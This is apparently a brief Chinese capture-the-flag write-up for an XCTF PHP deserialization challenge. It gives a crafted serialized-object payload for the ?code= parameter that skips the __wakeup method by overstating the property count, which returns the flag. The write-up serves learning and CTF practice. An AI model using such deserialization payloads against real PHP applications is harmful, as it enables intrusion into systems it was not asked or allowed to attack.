也是一道反序列化的题目。 class xctf{public $flag = '111';public function __wakeup(){exit('bad requests');}?code= 虽然并没有给出什么弹flag的代码,但是最后提示?code=。那么按照套路,先把__wakeup绕过去payload ?code=O:4:"xctf":2:{s:4:"flag";s:3:"111";} 直接就得到flag了。